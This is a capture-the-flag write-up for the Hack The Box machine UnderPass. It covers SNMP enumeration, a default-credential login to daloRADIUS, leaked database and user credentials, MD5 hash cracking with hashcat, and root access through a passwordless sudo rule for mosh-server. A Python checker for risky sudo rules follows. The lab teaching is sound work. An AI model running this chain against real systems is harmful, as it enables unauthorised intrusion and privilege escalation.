Hack The Box / LINUX / 2024-12-28

Hack The Box — UnderPass (Linux)

SNMP enumeration exposes a daloRADIUS deployment, default/operator credentials lead to svcMosh, and mosh-server sudo rights are abused to get root.

Target

  • IP: 10.10.11.48

Recon

sudo nmap -sC -sV 10.10.11.48 -p- -T5 -v
Discovered open port 80/tcp on 10.10.11.48
Discovered open port 22/tcp on 10.10.11.48

sudo nmap -sC -sV -sU 10.10.11.48 -T5 -v
Discovered open port 161/udp on 10.10.11.48

Download onesixtyone (https://github.com/trailofbits/onesixtyone).

cd onesixtyone
make
./onesixtyone 10.10.11.48 -c ./dict.txt
10.10.11.48 [public] Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64

snmp-check 10.10.11.48 -p 161 -c public
  Host IP address               : 10.10.11.48
  Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
  Description                   : Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
  Contact                       : steve@underpass.htb
  Location                      : Nevada, U.S.A. but not Vegas
  Uptime snmp                   : 00:35:01.46
  Uptime system                 : 00:34:51.17
  System date                   : 2024-12-27 10:53:56.0

More info:

snmpwalk -v 2c -c public 10.10.11.48

Add underpass.htb to /etc/hosts.

We discovered that underpass.htb is a daloRADIUS server (https://www.daloradius.com/, https://github.com/lirantal/daloradius).

Installation procedure reference:

https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS

Default credentials listed there are:

  • Username: administrator
  • Password: radius

Go to:

http://underpass.htb/daloradius/app/operators

There is a login form.

Log in with the default credentials.

In http://underpass.htb/daloradius/app/operators/config-db.php we find:

DB Engine: MySQLi
Database Port Number: 3306
Database Hostname: localhost
Database User: steve
Database Pass: testing123
Database Name: radius

In http://underpass.htb/daloradius/app/operators/mng-list-all.php we find user svcMosh, with:

username: svcMosh
password: 412DD4759978ACFCC81DEAB01B382403

The 32-character hex value looks like an unsalted MD5 hash. Save it to a file (./hash) and crack it with hashcat in MD5 mode (-m 0) against rockyou.txt:

hashcat -a 0 -m 0 ./hash ./rockyou.txt

We find password underwaterfriends.

ssh svcMosh@underpass.htb

Enter the cracked password.

sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

sudo /usr/bin/mosh-server new -i 10.10.11.48 -p 9002
MOSH CONNECT 9002 xocDw3oqzjC5OOB6yjoJQg

On the attacker machine:

MOSH_KEY=xocDw3oqzjC5OOB6yjoJQg mosh-client 10.10.11.48 9002

We get a shell as root: mosh-server spawns the session shell as the user that launched it, and sudo launched it as root, so the passwordless sudo rule is equivalent to granting a root shell.
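As an added defender-side check (not part of the original writeup), the following Python parses `sudo -l` output like the one shown above and flags passwordless root rules for binaries that hand the caller an interactive shell; the SHELL_SPAWNERS set is an assumed, illustrative list rather than an exhaustive catalogue.

```python
import re

# Constructed sample: the `sudo -l` output shown for svcMosh above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
"""

# Binaries that hand the caller an interactive shell once they run as root.
# Assumption: a small illustrative list, not an exhaustive catalogue.
SHELL_SPAWNERS = {"/usr/bin/mosh-server", "/bin/bash", "/bin/sh", "/usr/bin/vim"}

# "(runas) TAG: TAG: /path/to/command args" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return one dict per command rule found after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def risky_rules(rules):
    """Flag rules that run as root with no password and can spawn a shell."""
    flagged = []
    for r in rules:
        runas_root = r["runas"].split(":")[0].strip() in ("ALL", "root")
        binary = r["command"].split()[0]
        if runas_root and r["nopasswd"] and (binary == "ALL" or binary in SHELL_SPAWNERS):
            flagged.append(r)
    return flagged
```

Running `risky_rules(parse_sudo_l(SUDO_L_OUTPUT))` on the sample returns the mosh-server rule, which is the finding an audit of this host should raise.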